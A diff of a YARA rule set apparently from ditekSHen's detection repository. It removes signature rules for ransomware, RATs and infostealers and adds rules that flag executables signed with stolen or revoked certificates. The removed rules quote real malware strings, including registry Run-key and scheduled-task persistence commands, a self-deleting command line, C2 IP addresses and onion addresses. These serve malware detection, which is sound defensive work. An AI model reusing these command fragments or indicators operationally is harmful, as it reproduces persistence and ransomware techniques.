-		$x1 = "/osxrk_commandline/" ascii wide nocase
-		$x2 = "/Users/wangping/pangu/" ascii wide nocase
-		$s1 = "heartbeat" ascii wide
-		$s2 = "scanFiles" ascii wide
-		$s3 = "restartCMD" ascii wide
-		$s4 = "downloadFile" ascii wide
-		$s5 = "RDPInfo" ascii wide
+		thumbprint = "fd9b3f6b0eb9bd9baf7cbdc79ae7979b7ddad770"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aefcdac" and pe.signatures [ i ] . serial == "51:72:ca:a2:11:91:85:38:23:43:fc:be:09:c4:3b:ee" )
 }
-rule DITEKSHEN_MALWARE_Win_Bhunt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009245D1511923F541844Faa3C6Bfebcbe : FILE
 {
 	meta:
-		description = "Detects BHunt infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4c699f10-64a0-5e3c-af00-e08ebe1c6830"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "db876459-a0d2-542f-8f7e-a486ba68aeb4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9212-L9233"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3776-L3787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca0a7e6898047fa3b369125a4402e2beffd328a5db47b1d5dd5914a86d6f0073"
+		logic_hash = "8d2c186b3aaaf353857e67ffd51a785e674335e824be78fc1c2ae1b9a0532eae"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "BHUNT.Resources.resources" fullword ascii
-		$x2 = "//minecraftsquid.hopto.org/" wide
-		$s1 = "chaos_crew" ascii wide
-		$s2 = "golden7" ascii wide
-		$s3 = "mrpropper" ascii wide
-		$s4 = "/ifo.php?" ascii wide
-		$s5 = "bonanza=:=" ascii wide
-		$s6 = "blackjack=:=" ascii wide
-		$s7 = "SendPostData" fullword ascii
-		$c1 = "cmd /c REG ADD" wide
-		$c2 = "taskkill /F /IM" wide
-		$c3 = "cmd.exe /c wmic" wide
-		$g1 = "$ca9a291d-266c-41dc-9f1c-93cfe0dcac16" fullword ascii
-		$g2 = "$6d0feb35-213d-4b9f-afc7-06d168cfcb5e" fullword ascii
+		thumbprint = "509cbd2cd38ae03461745c7d37f6bbe44c6782cf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and ( 5 of ( $s* ) or 2 of ( $c* ) ) ) or ( 6 of ( $s* ) and 2 of ( $c* ) ) or ( all of ( $g* ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o.," and pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" )
 }
-rule DITEKSHEN_MALWARE_Win_Lorenz : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E161F76Da3B5E4623892C8E6Fda1Ea3D : FILE
 {
 	meta:
-		description = "Detects Lorenz ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9c11cfbc-aa77-5138-81e4-3a5f4f21a470"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a010cf24-b29a-5613-8122-92ced507564f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9235-L9265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3789-L3800"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9fc9d405b955c379ae40b1804d43b19999f6ea264fc645c897080fb020e8ae8"
+		logic_hash = "7aae91e2873633989b3716930354361ee56d7fd7af35e105ae15ed6bf87de67a"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "143.198.117.43" fullword ascii
-		$x2 = "157.90.147.28" fullword ascii
-		$x3 = "//kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
-		$x4 = "http://lorenz" ascii
-		$x5 = "\\lora\\Release\\lora.pdb" ascii
-		$x6 = "--MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" ascii
-		$x7 = "/USER:'HOMEOFFICE.COM\\" ascii
-		$x8 = "/USER:'Sentinel.com\\" ascii
-		$s1 = "to->_What == nullptr && to->_DoFree == false" fullword wide
-		$s2 = "*it == '\\0'" fullword wide
-		$s3 = "process call create 'cmd.exe /c" ascii
-		$s4 = "\\Control Panel\\Desktop\" /V Wallpaper /T REG_SZ /F /D" ascii
-		$s5 = "HELP_SECURITY_EVENT.html" ascii
-		$s6 = "<br>[+] Whats Happen?" ascii
-		$s7 = /\.Lorenz\.sz\d+$/ fullword ascii
-		$s8 = "TW9Vc29Db3JlV29ya2VyLmV4ZQ==" fullword ascii
-		$s9 = ".Speak(\"You've been hack" ascii nocase
-		$s10 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAo" ascii
-		$n1 = "ame_serv=" ascii
-		$n2 = "&ip=" ascii
-		$n3 = "&winver=Windows" ascii
-		$n4 = "&list_drive=" ascii
-		$n5 = "&file=" ascii
+		thumbprint = "df5fbfbfd47875b580b150603de240ead9c7ad27"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $n* ) and 2 of them ) or ( 1 of ( $x* ) and 6 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackcat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009Faf8705A3Eaef9340800Cc4Fd38597C : FILE
 {
 	meta:
-		description = "Detects BlackCat ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b6831d84-40d7-52ae-8c4d-30b087b0007b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5b85e806-6b13-5356-a225-23399b947114"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9267-L9289"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3802-L3813"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cd76e5b87f33d91c17fd032417583c3f68d0e310aaf6f08e26ec5d53844ed9d2"
+		logic_hash = "41c6561ef50950c7a5b4107b788e0469f77b9905b777edb24501649e4c313bd6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "{\"config_id\":\"\",\"public_key\":\"MIIBIjANBgkqhkiG9w0BAQEFAAO" ascii
-		$x2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" fullword ascii
-		$s1 = "encrypt_app::windows" ascii
-		$s2 = /locker::core::os::windows::(desktop_note|self_propagation|privilege_escalation|psexec|shadow_copy)/ ascii
-		$s3 = "uac_bypass::shell_exec=" ascii
-		$s4 = "-u-p-s-d-f-cpropagate::attempt=" ascii
-		$s5 = "masquerade_peb" ascii
-		$s6 = "RECOVER-${EXTENSION}-FILES.txt" ascii
-		$s7 = ".onion/?access-key=${ACCESS_KEY}" ascii
-		$s8 = "-vm-killno-vm-snapshot-killno-vm-kill-" ascii
-		$s9 = "esxi_vm_killenable_esxi_vm_snapshot_killstrict_" ascii
-		$s10 = /enum_(shares|servers)_sync::ok/ fullword ascii
-		$s11 = "hidden_partitions::mount_all::mounting=" ascii
+		thumbprint = "40c572cc19e7ca4c2fb89c96357eff4c7489958e"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" )
 }
-rule DITEKSHEN_MALWARE_Win_Koxic : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : FILE
 {
 	meta:
-		description = "Detects Koxic ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6a82bf44-b155-5746-b798-20a13623a14a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4c3153e4-d3ce-5e87-8e72-969cba972e26"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9291-L9309"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3815-L3826"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d874c8ebf330814e52d159cbf71f8bc05ebeb4a9fb93d96c3f861b51e57925a3"
+		logic_hash = "5e0d1b74422ae1004b0054c161d1dc949bb368ac17575e33c9b6d550bb136126"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$c1 = " INFO: >> %TEMP%\\" ascii wide
-		$c2 = "cmd /c \"wmic" ascii wide
-		$c3 = "cmd /c \"echo" ascii wide
-		$c4 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"%s\"" fullword wide
-		$c5 = /sc config.{1,30}start=disabled/ fullword ascii wide
-		$s1 = "Container: %s" fullword wide
-		$s2 = "Shotcut dir : %s" fullword wide
-		$s3 = "\\Microsoft\\Windows\\Network Shortcuts\\" fullword wide
-		$s4 = "Thread %d started." fullword ascii
-		$s5 = "ADD our TOXID:" wide
-		$s6 = "[Recommended] Using an email" wide
+		thumbprint = "eb5f5ab7294ba39f2b77085f47382bd7e759ff3a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $s* ) and 1 of ( $c* ) ) or ( 2 of ( $s* ) and ( #c1 > 5 or #c2 > 5 or #c3 > 5 or #c5 > 5 ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" )
 }
-rule DITEKSHEN_MALWARE_Win_Timetime : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C8Edcfe8Be174C2F204D858C5B91Dea5 : FILE
 {
 	meta:
-		description = "Detects TimeTime ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4d6a31b5-b5a5-58e2-bfce-c40c72cda391"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "196da268-b9a3-562c-ad68-67d17ea94ccf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9311-L9327"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3828-L3839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c75ca595ff25f8c79bfe8e5c6af29349be8f07c2de79fd24f09b02afffb7168b"
+		logic_hash = "56801a71547218413ab48381c412a8e1b7fd41a9f7a7c85dc6debdc38a19d6c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "@_DECRYPTOR_@" ascii wide
-		$s2 = "@__RECOVER_YOUR_FILES__@" wide
-		$s3 = "\\TimeTime.pdb" ascii
-		$s4 = "runCommand" fullword ascii
-		$s5 = "decryptor_file_name" fullword ascii
-		$s6 = "encryption_hiding_process" fullword ascii
-		$s7 = "admin_hiding_process" fullword ascii
-		$s8 = "security_vaccine" fullword ascii
-		$s9 = "EncrFiles_Load" fullword ascii
+		thumbprint = "7f5f205094940793d1028960e0f0e8b654f9956e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" )
 }
-rule DITEKSHEN_MALWARE_Win_Strifewater : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1A311630876F694Fe1B75D972A953Bca : FILE
 {
 	meta:
-		description = "Detects StrifeWater RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "69f0bd07-3e4e-5245-9c42-c3f8199b566e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2a39397f-1585-5f7f-a2a9-aab62d29a2b2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9329-L9354"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3841-L3852"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ddb189dfe58af08d2c0682239551a5b9d82db94eedcefc02895316bcbbaca3f2"
+		logic_hash = "f14532caf49e6f46f75e42e334d3170db0ebebfe75c9f3e057c237691b5d86a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "example/1.0" fullword wide
-		$s2 = "coname:" fullword ascii
-		$s3 = "*elev:" fullword ascii
-		$s4 = "*uname:" fullword ascii
-		$s5 = "--BoundrySign" ascii
-		$s6 = "000000c:\\users\\public\\libraries\\tmp.bi" ascii
-		$s7 = "9c4arSBr32g6IOni" fullword ascii
-		$pdb = "\\win8\\Desktop\\ishdar_win8\\" ascii
-		$xn1 = "techzenspace.com" fullword wide
-		$xn2 = "87.120.8.210" wide
-		$xn3 = "192.168.40.27" wide
-		$n1 = /RVP\/index\d+\.php/ fullword wide
-		$n2 = "tid=%d&code=%s&fname=%s&apiData=%s" fullword ascii
-		$n3 = "code=%s&tid=%d&fname=%s&apiData=%s" fullword ascii
-		$n4 = "Content-Disposition: form-data; name=\"token\"" fullword ascii
-		$n5 = "Content-Disposition: form-data; name=\"apiData\"" fullword ascii
-		$n6 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
-		$n7 = "Content-Disposition: form-data; name=\"tid\"" fullword ascii
+		thumbprint = "d473ec0fe212b7847f1a4ee06eff64e2a3b4001e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $xn* ) or 6 of ( $s* ) or 6 of ( $n* ) or ( 1 of ( $xn* ) and 4 of them ) or ( $pdb and 4 of them ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GTEC s.r.o." and pe.signatures [ i ] . serial == "1a:31:16:30:87:6f:69:4f:e1:b7:5d:97:2a:95:3b:ca" )
 }
-rule DITEKSHEN_MALWARE_Win_Surtr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A496Bc774575C31Abec861B68C36Dcb6 : FILE
 {
 	meta:
-		description = "Detects Surtr ransomware. Ransom note is similar to LockFile"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7a31415d-5c03-5537-9adb-65e637f9fa0e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2415bf62-15d4-562a-a448-682474d89af0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9356-L9378"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3854-L3865"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8db5588079d471d8904f0444973973a0c01dbec1ccbe3d43a34d41a0dde495d"
+		logic_hash = "bf5282687f4707bc16d388361ddc0af1102df0d29066ece0b57215fcf9fdcc94"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "<title>SurtrRansomware</title>" ascii
-		$s2 = "<HTA:APPLICATION ID=\"SurtrRansomware\"" ascii
-		$s3 = "APPLICATIONNAME=\"SurtrRansomware\"" ascii
-		$s4 = "src=\"data:image/jpeg; base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wCEAAgICAgJCAkKCgkNDgwODRMREBARExwUFhQWFBwrGx8bGx8bKyYuJSMlLiZENS8v" ascii
-		$s5 = "4rbgxisigb4pxnloxzc265rmzaj7fslrhyouegtrph2a7xhh55r6xaid.onion" ascii
-		$s6 = "schtasks /CREATE /SC ONLOGON /TN svchos" wide
-		$s7 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v \"svchos" ascii
-		$s8 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ /v \"svchos" ascii
-		$s9 = "SURTR_README.txt" wide
-		$s10 = "surtr-decrypt.top" ascii
-		$s11 = /(Public|Private|ID)_DATA\.surt/ wide
+		thumbprint = "b2c70d30c0b34bfeffb8a9cb343e5cad5f6bcbf7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" )
 }
-rule DITEKSHEN_MALWARE_Win_Udprat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ea720222D92Dc8D48E3B3C3B0Fc360A6 : FILE
 {
 	meta:
-		description = "Detects UDPRat"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "938fc9fd-4f08-5c23-8583-06083d2efe59"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2e43e98a-61f8-5f93-a415-52cb6453620d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9380-L9395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3867-L3878"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4606b304d179148c6e44a0a8329675f2823f862a0944284cb646e5910659ea7c"
+		logic_hash = "97b2699d4cb0fd88e3440ea82dd6ea87cdac69c6ba2acd884f5aef577b55e79d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\code\\UDP\\Client\\" ascii
-		$s2 = "ssdp:discover" ascii
-		$s3 = ": Device:" ascii
-		$s4 = "for the SNMP U encountered" ascii
-		$s5 = "privat:InternetGatewayelink" fullword ascii
-		$s6 = "schemas A jet error was" ascii
-		$s7 = "msidentity" fullword ascii
-		$s8 = "microsoftonliser-based Securi" ascii
+		thumbprint = "522d0f1ca87ef784994dfd63cb0919722dfdb79f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" )
 }
-rule DITEKSHEN_MALWARE_Win_Jesterstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_333Ca7D100B139B0D9C1A97Cb458E226 : FILE
 {
 	meta:
-		description = "Detects JesterStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7b07061f-97a4-5158-8084-46ccf212f6be"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "dd5b3eb8-81c0-570d-9ec8-6a55eb7864f9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9397-L9417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3880-L3891"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c84df5d3ad2bc7a75a11c07995cc034c2a92b2f6f6f6943288add9c44c57bf6d"
+		logic_hash = "4519127b975d93297cca9b465ad88b3d38ad0fce0de182246dca3f000e2438be"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = /\[(Credman|Networks|Screenshot|Vault)\]\s\{0\}/ fullword wide
-		$s3 = "encoding=\"base64\"" fullword wide
-		$s4 = "/json/list" fullword wide
-		$s5 = "/L1ghtM4n/TorProxy/" ascii wide
-		$s6 = "<EnumerateCredentials>" ascii
-		$s7 = "<EnumerateBrowsers>" ascii
-		$s8 = "<PerformSelfDestruct>" ascii
-		$s9 = "<get_GrabberCount>" ascii
-		$s10 = "AnalyzeData" fullword ascii
-		$s11 = "CheckCard" fullword ascii
-		$s12 = "CreateGrabberZipPath" fullword ascii
-		$s13 = "Jester" fullword ascii
-		$s14 = /Stealer\.(Recovery|Grabber|Investigation)\./ ascii
+		thumbprint = "d618cf7ef3a674ff1ea50800b4d965de0ff463cb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" )
 }
-rule DITEKSHEN_MALWARE_Win_Soranostealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_58Ec8821Aa2A3755E1075F73321756F4 : FILE
 {
 	meta:
-		description = "Detects SoranoStealer / HogGrabber. Available on Github: /Alexuiop1337/SoranoStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2fc40a73-5f28-5b5c-938a-35e8336e1d11"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "efa0e5c6-773a-5740-b7f9-ec10a92b1623"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9419-L9443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3893-L3904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27c9d6bf3f40f3d41c35975e856671fafcd4a0a8143b3bcbdff61c1fb28a37ab"
+		logic_hash = "b79f161c77cbae0bec55fb2b047983660c84d2bb93db8c91cb6c22fd4ad197cc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "OiCuntJollyGoodDayYeHavin_" ascii
-		$x2 = { 00 56 4d 50 72 6f 74 65 63 74 00 52 65 61 63 74
-                6f 72 00 64 65 34 66 75 63 6b 79 6f 75 00 42 61
-                62 65 6c 4f 62 66 75 73 63 61 74 6f 72 41 74 74
-                72 69 62 75 74 65 00 43 72 79 74 70 6f 4f 62 66
-                75 73 63 61 74 6f 72 00 }
-		$x3 = { 00 4f 62 66 75 73 63 61 74 65 64 42 79 47 6f 6c
-                69 61 74 68 00 42 65 64 73 2d 50 72 6f 74 6f 72 00 }
-		$s1 = ".Binaries.whysosad" ascii
-		$s2 = "Adminstrator permissons are required" wide
-		$s3 = "12:03:33:4A:04:AF" fullword wide
-		$s4 = "RemoveEXE" fullword ascii
-		$s5 = "$340becfa-1688-4c32-aa49-30fdb4005e4b" fullword ascii
-		$s6 = "$99cffbcc-6ad7-4d32-bd1f-450967cf4a6b" fullword ascii
-		$s7 = "\"cam\": " ascii
-		$s8 = " - 801858595527371999762718088" fullword ascii
-		$s9 = "  - 96188142294460126639341306" fullword ascii
+		thumbprint = "19dd0d7f2edf32ea285577e00dd13c966844cfa4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbebbfeaddcbcccffdcdc" and pe.signatures [ i ] . serial == "58:ec:88:21:aa:2a:37:55:e1:07:5f:73:32:17:56:f4" )
 }
-rule DITEKSHEN_MALWARE_Win_Gloomanestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0940Fa9A4080F35052B2077333769C2F : FILE
 {
 	meta:
-		description = "Detects GloomaneStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6e3c7e8f-4b75-5198-aa41-076f29aac227"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2cc722de-97ff-53d1-9436-dc88c844186b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9445-L9461"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3906-L3917"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "36aa9f863efb8172ed6449932169e6cb26cdeedd84bc734e09a8116a9c7774ac"
+		logic_hash = "3ecf6982c779a5fd867fef4b753313e379151491fa8865e8ae20f0c9362431a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "=GLOOMANE STEALER=" wide
-		$x2 = "Maded by GLOOMANE" wide
-		$s1 = "\\44CALIBER" ascii
-		$s2 = "Ethernet()" fullword wide
-		$s3 = ":spy: NEW LOG FROM" wide
-		$s4 = ":eye: IP:" wide
-		$s5 = ":file_folder: Grabbed Files" wide
-		$s6 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
-		$s7 = "$3b0e2d3d-3d66-42bb-8f9c-d6e188f359ae" fullword ascii
+		thumbprint = "da154c058cd75ff478b248701799ea8c683dd7a5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" )
 }
-rule DITEKSHEN_MALWARE_Win_Lockdown : FILE
+
